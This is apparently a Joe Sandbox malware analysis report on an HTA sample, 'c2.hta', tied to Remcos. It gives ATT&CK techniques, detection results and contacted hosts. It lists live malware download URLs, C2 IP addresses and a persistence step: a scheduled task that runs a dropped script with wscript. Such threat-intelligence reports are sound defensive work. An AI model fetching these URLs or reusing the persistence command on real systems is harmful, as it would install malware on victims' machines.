Gather Victim Identity Information	111 Scripting	2 Valid Accounts	1 Windows Management Instrumentation	111 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	121 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Email Collection	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	2 Valid Accounts	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	121 Input Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	28 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	2 Registry Run Keys / Startup Folder	12 Process Injection	111 Masquerading	LSA Secrets	121 Security Software Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	2 Valid Accounts	Cached Domain Credentials	121 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	13 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	2 Registry Run Keys / Startup Folder	121 Virtualization/Sandbox Evasion	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
c2.hta	18%	ReversingLabs	Script-WScript.Trojan.AgentTesla

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	0%	ReversingLabs

Source	Detection	Scanner	Label
https://myguyapp.com/c2.batG0)	0%	Avira URL Cloud	safe
https://myguyapp.com/J	0%	Avira URL Cloud	safe
https://myguyapp.com/W2.pdfy	0%	Avira URL Cloud	safe
https://myguyapp.com/c2	0%	Avira URL Cloud	safe
https://myguyapp.com/	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zip6	0%	Avira URL Cloud	safe
https://myguyapp.com/W2.pdf/	0%	Avira URL Cloud	safe
https://myguyapp.com/c2.b))&chr(	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipTJ	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zip	100%	Avira URL Cloud	malware
https://myguyapp.comH14f;;	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAMINGP	0%	Avira URL Cloud	safe
https://myguyapp.com/g(	0%	Avira URL Cloud	safe
https://myguyapp.comH14f	0%	Avira URL Cloud	safe
https://myguyapp.co4)&ch	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipHL	0%	Avira URL Cloud	safe
https://myguyapp.com/c2.batrg	0%	Avira URL Cloud	safe
https://myguyapp.com/c	0%	Avira URL Cloud	safe
https://myguyapp.com/c2.	0%	Avira URL Cloud	safe
https://myguyapp.com/c2.bat8	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipV	0%	Avira URL Cloud	safe
https://myguyapp.com/W2.pdf	0%	Avira URL Cloud	safe
https://myguyapp.co4)&chvv	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdf	0%	Avira URL Cloud	safe
https://myguyapp.com/c2.S	0%	Avira URL Cloud	safe
https://myguyapp.com/c2.ba10	0%	Avira URL Cloud	safe
https://myguyapp.com/c2H	0%	Avira URL Cloud	safe
https://myguyapp.c(-3378	0%	Avira URL Cloud	safe
https://myguyapcom/c2.bat	0%	Avira URL Cloud	safe
https://myguyapp.com/c2.bat	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
geoplugin.net	178.237.33.50	true	false	high
me-work.com	193.26.115.39	true	false	high
myguyapp.com	193.26.115.39	true	false	high
x1.i.lencr.org	unknown	unknown	false	high
ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://myguyapp.com/msword.zip	true	Avira URL Cloud: malware	unknown
http://geoplugin.net/json.gp	false		high
https://myguyapp.com/W2.pdf	true	Avira URL Cloud: safe	unknown
https://myguyapp.com/c2.bat	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://myguyapp.com/	mshta.exe, 00000000.00000002.2017009413.000000000532C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2008561227.000000000532C000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://myguyapp.com/W2.pdf/	msword.exe, 0000000F.00000002.2028276844.00000000006AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zipTJ	tasklist.exe, 00000017.00000002.2052105236.0000000002F78000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/J	mshta.exe, 00000000.00000002.2017009413.000000000532C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2008561227.000000000532C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zip6	tasklist.exe, 00000015.00000002.2043420567.0000000000518000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/c2.batG0)	mshta.exe, 00000000.00000002.2022225749.00000000067CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2009138600.00000000067C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2008889087.00000000067B7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/W2.pdfy	extrac32.exe, 0000001A.00000002.2057409015.0000000002938000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/c2	mshta.exe, 00000000.00000002.2017871072.0000000005FF0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/c2.b))&chr(	mshta.exe, 00000000.00000003.1645277798.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1644774097.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645547061.00000000007E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/c2.batrg	mshta.exe, 00000000.00000003.1656744257.000000000085B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2008927810.000000000085D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2015870772.0000000000860000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.co4)&ch	mshta.exe, 00000000.00000003.1645277798.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1644774097.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/c2.	mshta.exe, 00000000.00000003.1645277798.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1644774097.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.comH14f	mshta.exe, 00000000.00000003.1645277798.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1644774097.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/X	Propose.com, 0000001E.00000003.2067249012.000000000448D000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001E.00000000.2060650659.00000000003B5000.00000002.00000001.01000000.0000000F.sdmp, LinkHub.com, 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmp, LinkHub.com, 00000028.00000002.2209734744.0000000000C85000.00000002.00000001.01000000.00000011.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	msword.exe, 0000000F.00000000.2007838573.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe, 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe.11.dr	false		high
https://myguyapp.com/msword.zipHL	tasklist.exe, 00000015.00000003.2042717140.000000000054B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2043123562.000000000054B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2043552243.000000000054B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.comH14f;;	mshta.exe, 00000000.00000003.1645772502.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645919900.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645547061.00000000007E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAMINGP	cmd.exe, 00000023.00000002.2076250703.00000000028E0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.2076706900.0000000002D00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/autoit3/	Propose.com, 0000001E.00000003.2334608553.0000000003D2D000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2067249012.000000000448D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myguyapp.com/g(	mshta.exe, 00000000.00000003.1645277798.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1644774097.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645772502.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645919900.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645547061.00000000007E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/c2.bat8	mshta.exe, 00000000.00000003.1643719555.0000000005D1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1643769959.0000000005D1F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/c	mshta.exe, 00000000.00000003.1645277798.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1644774097.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645547061.00000000007E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zipV	tasklist.exe, 00000017.00000003.2051554861.0000000002F90000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.2051641791.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.2051505416.0000000002F8E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000002.2052204852.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/c2H	mshta.exe, 00000000.00000003.1645277798.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1644774097.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645547061.00000000007E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/c2.S	mshta.exe, 00000000.00000003.1645547061.00000000007E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdf	Propose.com, 0000001E.00000003.2068166275.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2066787736.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2066826334.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2068127580.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2066809263.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2068098727.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2066914870.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2066748792.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2066863454.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2066769328.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.2066843995.00000000014D4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.co4)&chvv	mshta.exe, 00000000.00000002.2015583757.0000000000800000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2009182730.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645772502.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645919900.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2012317613.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645547061.00000000007E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapcom/c2.bat	mshta.exe, 00000000.00000002.2018361418.00000000061F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/c2.ba10	mshta.exe, 00000000.00000003.1645277798.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1644774097.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645547061.00000000007E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.c(-3378	mshta.exe, 00000000.00000002.2015583757.0000000000800000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645277798.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1644774097.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2009182730.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645772502.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645919900.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2012317613.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1645547061.00000000007E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
178.237.33.50	geoplugin.net	Netherlands		8455	ATOM86-ASATOM86NL	false
193.26.115.39	me-work.com	Netherlands		46261	QUICKPACKETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585143
Start date and time:	2025-01-07 06:22:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	c2.hta
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winHTA@72/99@8/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 84 Number of non-executed functions: 299
Cookbook Comments:	Found application associated with file extension: .hta

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.88.176, 3.233.129.217, 52.6.155.20, 52.22.41.97, 3.219.243.226, 2.16.168.105, 2.16.168.107, 162.159.61.3, 172.64.41.3, 23.209.209.135, 199.232.210.172, 23.40.179.19, 23.40.179.35, 23.56.254.164, 52.149.20.212, 23.47.168.24, 173.222.162.32, 13.107.246.45
Excluded domains from analysis (whitelisted): www.bing.com, e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
Execution Graph export aborted for target mshta.exe, PID 7164 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:22:58	API Interceptor	13x Sleep call for process: mshta.exe modified
00:22:59	API Interceptor	62x Sleep call for process: powershell.exe modified
00:23:16	API Interceptor	2x Sleep call for process: AcroCEF.exe modified
00:23:34	API Interceptor	1x Sleep call for process: msword.exe modified
00:24:40	API Interceptor	62x Sleep call for process: Propose.com modified
05:23:39	Task Scheduler	Run new task: Murray path: wscript s>//B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
05:23:43	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
178.237.33.50	17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Tax_Refund_Claim_2024_Australian_Taxation_Office.js	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	c2.hta	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	4XYAW8PbZH.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	iGhDjzEiDU.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	1.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	heteronymous.vbs	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	2LDJIyMl2r.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	1evAkYZpwDV0N4v.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
193.26.115.39	9W9jJCj9EV.bat	Get hash	malicious	Remcos	Browse
	c2.hta	Get hash	malicious	Remcos	Browse
	c2.hta	Get hash	malicious	Remcos	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
me-work.com	c2.hta	Get hash	malicious	Remcos	Browse	193.26.115.39
	c2.hta	Get hash	malicious	XWorm	Browse	193.26.115.21
	c2.hta	Get hash	malicious	XWorm	Browse	193.26.115.21
	c2.hta	Get hash	malicious	XWorm	Browse	193.26.115.21
	c2.hta	Get hash	malicious	XWorm	Browse	87.120.117.152
	p5.hta	Get hash	malicious	XWorm	Browse	45.88.186.197
bg.microsoft.map.fastly.net	sfqbr.ps1	Get hash	malicious	DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	199.232.214.172
	Vernales Restaurant-encrypted.pdf	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	KHK0987.xlsx	Get hash	malicious	Unknown	Browse	199.232.214.172
	new.bat	Get hash	malicious	Unknown	Browse	199.232.214.172
	fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	199.232.210.172
	#Employee-Letter.pdf	Get hash	malicious	Unknown	Browse	199.232.210.172
	Agent381.msi	Get hash	malicious	Unknown	Browse	199.232.210.172
	build.exe	Get hash	malicious	RedLine	Browse	199.232.214.172
	AZfDGVWF68.pdf	Get hash	malicious	Unknown	Browse	199.232.210.172
	CKi4EZWZsC.ps1	Get hash	malicious	DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	199.232.214.172
myguyapp.com	c2.hta	Get hash	malicious	Remcos	Browse	193.26.115.39
	c2.hta	Get hash	malicious	XWorm	Browse	193.26.115.21
	c2.hta	Get hash	malicious	XWorm	Browse	193.26.115.21
	c2.hta	Get hash	malicious	XWorm	Browse	193.26.115.21
	EeSNugjFh5.bat	Get hash	malicious	Unknown	Browse	193.26.115.21
	c2.hta	Get hash	malicious	XWorm	Browse	193.26.115.21
geoplugin.net	17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Tax_Refund_Claim_2024_Australian_Taxation_Office.js	Get hash	malicious	Remcos	Browse	178.237.33.50
	c2.hta	Get hash	malicious	Remcos	Browse	178.237.33.50
	4XYAW8PbZH.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	iGhDjzEiDU.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	1.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	heteronymous.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	2LDJIyMl2r.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	1evAkYZpwDV0N4v.exe	Get hash	malicious	Remcos	Browse	178.237.33.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ATOM86-ASATOM86NL	9W9jJCj9EV.bat	Get hash	malicious	Remcos	Browse	178.237.33.50
	17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Tax_Refund_Claim_2024_Australian_Taxation_Office.js	Get hash	malicious	Remcos	Browse	178.237.33.50
	c2.hta	Get hash	malicious	Remcos	Browse	178.237.33.50
	c2.hta	Get hash	malicious	Remcos	Browse	178.237.33.50
	4XYAW8PbZH.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	iGhDjzEiDU.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	1.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	heteronymous.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
QUICKPACKETUS	https://z97f4f2525fyg27.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	172.82.129.154
	9W9jJCj9EV.bat	Get hash	malicious	Remcos	Browse	193.26.115.39
	c2.hta	Get hash	malicious	Remcos	Browse	193.26.115.39
	c2.hta	Get hash	malicious	Remcos	Browse	193.26.115.39
	Dd5DwDCHJD.exe	Get hash	malicious	Quasar	Browse	193.31.28.181
	3e88PGFfkf.exe	Get hash	malicious	DCRat	Browse	185.230.138.58
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	198.22.235.170
	la.bot.powerpc.elf	Get hash	malicious	Mirai	Browse	198.22.243.54
	la.bot.mipsel.elf	Get hash	malicious	Mirai	Browse	172.98.171.129
	surfex.exe	Get hash	malicious	RedLine	Browse	185.218.125.157

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	setup-avast-premium-x64.exe	Get hash	malicious	Unknown	Browse	193.26.115.39
	setup-avast-premium-x64.exe	Get hash	malicious	Unknown	Browse	193.26.115.39
	ZipThis.exe	Get hash	malicious	Unknown	Browse	193.26.115.39
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.26.115.39
	https://sendbot.me/mousse-w0fysl7	Get hash	malicious	Unknown	Browse	193.26.115.39
	fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.26.115.39
	anrek.mp4.hta	Get hash	malicious	LummaC Stealer	Browse	193.26.115.39
	title.mp4.hta	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	193.26.115.39
	Agent381.msi	Get hash	malicious	Unknown	Browse	193.26.115.39
	Setup.exe	Get hash	malicious	Unknown	Browse	193.26.115.39
37f463bf4616ecd445d4a1937da06e19	H565rymIuO.doc	Get hash	malicious	Unknown	Browse	193.26.115.39
	287438657364-7643738421.08.exe	Get hash	malicious	Nitol	Browse	193.26.115.39
	287438657364-7643738421.08.exe	Get hash	malicious	Unknown	Browse	193.26.115.39
	u1XWB0BIju.msi	Get hash	malicious	Unknown	Browse	193.26.115.39
	setup.msi	Get hash	malicious	Unknown	Browse	193.26.115.39
	2749837485743-7684385786.05.exe	Get hash	malicious	Nitol	Browse	193.26.115.39
	2749837485743-7684385786.05.exe	Get hash	malicious	Unknown	Browse	193.26.115.39
	drop1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	193.26.115.39
	ZT0KQ1PC.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	193.26.115.39

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	installer_1.05_36.8.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	DansMinistrie.exe	Get hash	malicious	LummaC	Browse
	installer_1.05_36.7.exe	Get hash	malicious	LummaC Stealer	Browse
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse
	'Set-up.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	9W9jJCj9EV.bat	Get hash	malicious	Remcos	Browse
	c2.hta	Get hash	malicious	Remcos	Browse
	c2.hta	Get hash	malicious	Remcos	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	installer_1.05_36.8.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	DansMinistrie.exe	Get hash	malicious	LummaC	Browse
	installer_1.05_36.7.exe	Get hash	malicious	LummaC Stealer	Browse
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse
	'Set-up.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	9W9jJCj9EV.bat	Get hash	malicious	Remcos	Browse
	c2.hta	Get hash	malicious	Remcos	Browse
